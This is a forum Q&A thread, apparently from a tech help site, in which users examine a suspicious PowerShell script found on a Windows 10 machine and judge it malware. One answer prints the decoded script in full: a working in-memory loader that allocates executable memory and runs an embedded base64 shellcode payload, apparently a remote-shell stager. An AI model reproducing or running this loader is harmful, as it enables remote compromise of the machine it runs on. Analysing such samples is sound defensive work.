Is this powershell script an infection?

It decompresses just fine for me... I converted the Base64 string into binary, then ran gunzip on it (I am using a Linux system here). This results in another piece of PowerShell that does things which can only be considered as definitely fishy. It contains a piece of 450 bytes, that it loads into (native) RAM, and runs as code. I am way too lazy to disassemble the piece of code, but I feel pretty safe when I say that this piece of code is not safe at all.

Looks likes there is some malware in your machine, that tries to gain some privileges. It's time for some nuking, I'd say.

Posting this in an answer, because it's too big for a comment: I don't know what it does (though it does look sketchy) but here's the expansion. It's a PS script itself, of course:

function t2Mj {
    Param ($hVrV8B2fWj, $zfOqpP8)                
    $mJnysoxSPX = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')

    return $mJnysoxSPX.GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($mJnysoxSPX.GetMethod('GetModuleHandle')).Invoke($null, @($hVrV8B2fWj)))), $zfOqpP8))
}

function j1G8vwsPg {
    Param (
            [Parameter(Position = 0, Mandatory = $True)] [Type[]] $srs_LF,
            [Parameter(Position = 1)] [Type] $lTMpjL3Mn = [Void]
    )

    $b0pq = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
    $b0pq.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $srs_LF).SetImplementationFlags('Runtime, Managed')
    $b0pq.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $lTMpjL3Mn, $srs_LF).SetImplementationFlags('Runtime, Managed')

    return $b0pq.CreateType()
}

[Byte[]]$wgOO3l = [System.Convert]::FromBase64String("/EiD5PDozAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdBmgXgYCwIPhXIAAACLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpS////11JvndzMl8zMgAAQVZJieZIgeygAQAASYnlSbwCAACJCsgeEEFUSYnkTInxQbpMdyYH/9VMiepoAQEAAFlBuimAawD/1WoFQV5QUE0xyU0xwEj/wEiJwkj/wEiJwUG66g/f4P/VSInHahBBWEyJ4kiJ+UG6maV0Yf/VhcB0DEn/znXlaPC1olb/1UiD7BBIieJNMclqBEFYSIn5QboC2chf/9VIg8QgXkhj9mpAQVloABAAAEFYSInySDHJQbpYpFPl/9VIicNJicdNMclJifBIidpIiflBugLZyF//1UgBw0gpxkiF9nXhQf/n")

$zk1lmz = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((t2Mj kernel32.dll VirtualAlloc), (j1G8vwsPg @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $wgOO3l.Length,0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($wgOO3l, 0, $zk1lmz, $wgOO3l.length)

$oFpHGWmDM = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((t2Mj kernel32.dll CreateThread), (j1G8vwsPg @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$zk1lmz,[IntPtr]::Zero,0,[IntPtr]::Zero)
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((t2Mj kernel32.dll WaitForSingleObject), (j1G8vwsPg @([IntPtr], [Int32]))).Invoke($oFpHGWmDM,0xffffffff) | Out-Null

Definitely looks questionable. I don't recognize it, though.

Is this powershell script an infection?

Tags:

Powershell

Virtualization

Malware

Windows 10

Related

Recent Posts